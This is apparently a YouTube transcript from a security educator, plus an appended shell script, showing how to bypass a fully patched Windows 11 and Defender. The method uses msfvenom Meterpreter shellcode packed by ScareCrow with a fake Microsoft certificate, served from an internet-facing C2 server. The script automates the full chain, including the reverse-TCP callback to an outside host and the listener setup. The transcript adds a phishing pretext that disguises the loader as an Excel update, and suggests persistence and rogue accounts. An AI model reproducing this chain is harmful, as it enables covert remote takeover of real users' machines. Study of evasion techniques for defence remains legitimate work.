Bypassing a FULLY Patched Windows 11 + Defender with a Meterpreter Shell Using ScareCrow!

Captions
Hey, what is up everyone, Tyler Ramsbey here, back with another video, and in this video I want to show you a second way to bypass Windows Defender. So you may have seen my video from last week where we used hoaxshell, specifically the hoaxshell listener, to bypass a fully patched version of Windows 11 and Windows Defender, but the problem is, as some of you may have pointed out on LinkedIn, that was a very simple reverse shell, not that hacky, not that cool. We're going to turn it up a notch, and let's see if we can get a full Meterpreter shell on an updated version of Windows 11 and an updated version of Windows Defender using a really cool program called ScareCrow. Without any more further ado, let's go ahead and dive into it.

Now, just to make sure I'm not making this up, let's check Windows Security. The machine that we're on right now is not a virtual machine; this is my real physical device, my daily driver that I use day in and day out, that I keep updated, so you can see everything is on. It was last updated 6/18 10:45 PM and it is 6/18 11:33 PM, so everything is fully updated on this Windows Defender machine. The way we're going to attack it: I wanted to make it as realistic as possible, so we're not doing this in, like, VMs and VPNs, we are simulating what a real attacker would do. So I have spun up a C2 server in Azure so that we have a public IP, so that we can host malicious payloads for anyone with internet access, so I can target any computer. So once again, we're not going through a VPN, y'all, we're going across the internet like a real attacker would do to download the malicious file, execute it on our machine, and let's see if Defender can catch us. So I spun up this VM, we have SSH open, and what I have done is just SSH into it, so everything you see here, although it looks like PowerShell, it is not; I just used PowerShell to SSH into our Kali Linux machine in the Azure cloud.

Now ScareCrow has a few dependencies. What I have done, if you look at the description of this link, I put in my GitHub a bash script. Run the bash script on your Kali VM; it will download ScareCrow and it will download all the dependencies, so in a couple of minutes you are up and running just by running one script. You're welcome.

So what the heck is ScareCrow? Well, ScareCrow is a payload creation framework for side loading into legitimate Windows processes. Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR's hooks out of the system DLLs running in the process's memory. This works because we know the EDR hooks are placed when a process is spawned. In other words, it's just crazy; I really don't know how all of this works, but read through this if you want the technical details. For this video I do not want to bore you by reading a long paragraph of stuff; let's just do it, right? It may not work, and when it comes to ethical hacking, pen testing, a lot of it is trial and error.

Now, to set the scenario: the way a real attacker would set this up is they would likely create a web server, and in their web server they would have a landing page that looks like an authentic Microsoft page. What they might do then is, if they have compromised credentials in your organization, maybe someone's email, or they send an email that looks like it's coming from help desk, and they say, "Hey everyone, we are updating the software in our organization, go ahead and go here, download the installer, get it installed, and then you'll be fully updated and ready to go." So you would use some social engineering, maybe some phishing techniques, to get this exe on a victim's computer. It will appear to be signed by Microsoft, it will appear to be safe because Defender's not going to pick up on it, and boom, you got them. So will it work? I don't know. It's worked sometimes, it hasn't worked other times, and we are just going to give it a shot and work through this together. So if you have your own VM, I would encourage you to follow along: you can spin up a Kali VM and you can spin up, like, a Windows machine, or set up networking on VirtualBox or VMware, and you can follow along with me. Run the script in the description of the video, get ScareCrow installed, and now the first thing we're going to do is generate our payload with msfvenom.

You can see my previous one from all the testing I've been doing as I've been playing around with this in my own little lab here. We'll do our LHOST, which is going to be the public IP of our malicious C2 server; LPORT is going to be 443 to make it look like regular traffic; and we'll call it AV bypass.bin. While that does its thing, let's go ahead and get Metasploit launched. There we go. All right, AV bypass.bin is there, so now we're going to run that through ScareCrow: -I, that is, we're going to inject AV bypass.bin; we want it to look like it's signed by microsoft.com so it looks a little more legit; and we're going to add some encryption as well to make it a little more difficult to figure out what is going on. Let's go ahead and click enter. Okay, so we created this cmd.exe with a fake cert, and it'll appear like it's signed by Microsoft, so let's go ahead and move cmd.exe, whoop, cmd.exe, to the C2 server directory under home/Tyler. There we go. And if we go over to our C2 server here, we can go ahead and start a regular Python web server, but this is different than, like, your TryHackMe or your Hack The Box machine; we're serving this out to all the internet, so if I was doing this live you'd be able to come download this and, uh, get pwned by me in Metasploit.

Let's get our listener ready, so we'll use exploit/multi/handler. We have to set our payload to match the payload of the malicious payload we just created with msfvenom, which was windows/x64/meterpreter/reverse_tcp. There we go. Let's do options. We'll set our LHOST to match our malicious C2 server, which is this right here, so let's grab that down. Of course, I don't want the HTTP though, we just want the IP, and we'll set our LPORT on 443 because I have that port listening in our networking stuff on Azure. So we have our payload set, we have our LHOST set, we have our LPORT set, let's go ahead and click run. So our listener is ready, we are good to go.

We are serving this file out maliciously. Once again, a real attacker would probably set up, like, a landing page; we just have "Welcome to Tyler C2 server", so pretty obvious that it's malicious. We can look at my test.txt file; we're successfully storing, or serving, files. Let's see if we can do a cmd.exe. Of course, an attacker probably wouldn't call it cmd.exe, but we just want to see if we can bypass Defender. This is not Defender catching it; this is just a browser saying, "Hey, we don't normally download this," but you might think, "Okay, well, let me see more." The name cmd.exe, and it's signed by microsoft.com, so, I mean, right, it must be safe. Ooh, and Windows Defender caught us, so we are zero of one in our fight against Windows Defender. And what a real hacker would do is they would find one that works, one that bypasses Windows Defender, and then they would target you with that one. So let's make another one. We have Excel; we'll make a few of them and let's see if any of these make it past Windows Defender. We have another, another cmd. All right, so let's go back to this server and we will remove this cmd.exe so it's clean, and let's go over to ScareCrow and we'll move excel.exe, PowerPoint, whoops, powerpoint.exe, what else we got, word.exe, cmd.exe, is that all of them, to the C2 server directory under home/Tyler, and then on our C2 server, all right, sudo python3 -m, let's see if any of these can make it past Windows Defender, shall we? Oh, it looks like excel.exe maybe made it past Defender. Let's make sure our listener is running right now, and so if I was an attacker I'd be like, "All right, I'm going to take note of that," and you can see it looks legit. So even if we take this application, move it over here, you're like, "Oh, okay, this is Excel, right? So help desk told me I need to update Excel, download this exe, and I'll run it; it was signed by Microsoft, everything must be good." And so let's just double click it. Okay, that's a little out of the ordinary, but maybe it helped us that that's gonna happen, and look at that: we have fully bypassed Windows Defender. We have a full Meterpreter shell on a fully patched version of Windows 11, fully patched version of Windows Defender. I have a Meterpreter shell on my host machine, and it only took two iterations of it. Our first exe did not work, Windows Defender caught it, but as a hacker, what I would have done if I was targeting someone is I would spin up the version that they're running of Windows Defender and I would try till I have one that bypasses Defender, and then I would use that one to target the user, knowing that that one is going to work.

So Meterpreter is running, I have a Meterpreter shell. From here you can enumerate for information; maybe, if you're not already admin, you can look at privilege escalation; you can set up persistence here, maybe make your own account on the host machine; if it's an Active Directory environment you can begin to dig deeper into the environment to see what you can find. But friends, that is why you don't use Windows Defender in an enterprise environment. A real EDR, endpoint detection and response, solution would likely detect this based on behavior, but we did bypass Windows 11 and Windows Defender using ScareCrow. Hopefully you guys found this video interesting, a little bit fun to watch, and, uh, have fun out there. I'll catch you guys in the next one. See ya.
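The chain the video walks through (msfvenom raw shellcode, ScareCrow loader with a fake signing domain, Python web server, exploit/multi/handler listener) written up as one reproducible script. This is an added example, not the script from the video description and not part of ScareCrow or Metasploit. Assumptions: the LHOST value is a placeholder from the TEST-NET-3 documentation range, the file and directory names are made up, and the ScareCrow flags (-I, -Loader, -domain, -encryptionmode) are the ones in the ScareCrow README as I recall them, so check them against ./ScareCrow -h before relying on them. The point the video stresses is encoded here once: PAYLOAD, LHOST and LPORT are shared between the msfvenom command and the handler resource script, because a mismatch means the stager never connects back.

```shell
#!/usr/bin/env sh
# Added example (not the video's own script): msfvenom -> ScareCrow -> http.server -> multi/handler.
# LHOST is a placeholder (TEST-NET-3); file names and the www directory are assumptions.
set -eu

LHOST="${LHOST:-203.0.113.10}"                  # assumed public IP of the Azure C2 host
LPORT="${LPORT:-443}"                           # 443 so the callback blends with HTTPS traffic
PAYLOAD="windows/x64/meterpreter/reverse_tcp"   # must be identical for msfvenom and the handler
RAW_BIN="${RAW_BIN:-av_bypass.bin}"             # assumed name for the raw shellcode file
SIGN_DOMAIN="${SIGN_DOMAIN:-www.microsoft.com}" # -domain only produces a self-signed cert with this name
WWW_DIR="${WWW_DIR:-./c2-www}"                  # assumed directory the loader is served from

# ScareCrow consumes raw 64-bit shellcode, so msfvenom must emit -f raw, not an exe.
msfvenom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f raw -o %s\n' "$PAYLOAD" "$LHOST" "$LPORT" "$RAW_BIN"
}

# Wrap the shellcode in a standalone exe loader; ScareCrow names the output after a
# Microsoft binary (cmd.exe, excel.exe, ...) and attaches a fake cert for SIGN_DOMAIN.
# Flags per the ScareCrow README; verify with ./ScareCrow -h.
scarecrow_cmd() {
  printf './ScareCrow -I %s -Loader binary -domain %s -encryptionmode AES\n' "$RAW_BIN" "$SIGN_DOMAIN"
}

# msfconsole resource script. The three values below come from the same variables as
# msfvenom_cmd, so the handler cannot drift from the payload that was generated.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Plain Python web server rooted at the directory the loaders were moved to.
serve_cmd() {
  printf 'sudo python3 -m http.server 80 -d %s\n' "$WWW_DIR"
}

# Run the real tools only when they are installed; otherwise print the exact commands.
run_chain() {
  handler_rc > handler.rc
  if command -v msfvenom >/dev/null 2>&1 && [ -x ./ScareCrow ]; then
    eval "$(msfvenom_cmd)"
    eval "$(scarecrow_cmd)"
    echo "listener: msfconsole -q -r handler.rc"
    echo "serve:    $(serve_cmd)"
  else
    echo "msfvenom or ./ScareCrow not found; the chain would be:"
    msfvenom_cmd
    scarecrow_cmd
    echo "msfconsole -q -r handler.rc"
    serve_cmd
  fi
}
```

Two caveats worth keeping in mind when you reproduce this. First, the -domain option only creates a self-signed certificate whose subject carries that name; it does not chain to a trusted root, so on the Windows side Get-AuthenticodeSignature or sigcheck will still report the signature as invalid, and the "signed by microsoft.com" impression exists only in Explorer's Properties dialog. Second, as the video says, a static miss by Defender is not the end of the story: the stager's outbound TCP connection and the loader's in-memory behaviour are exactly what a behavioural EDR keys on.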
Info
Channel: Tyler Ramsbey
Views: 14,904
Id: HmiAddzFFac
Length: 9min 48sec (588 seconds)
Published: Mon Jun 19 2023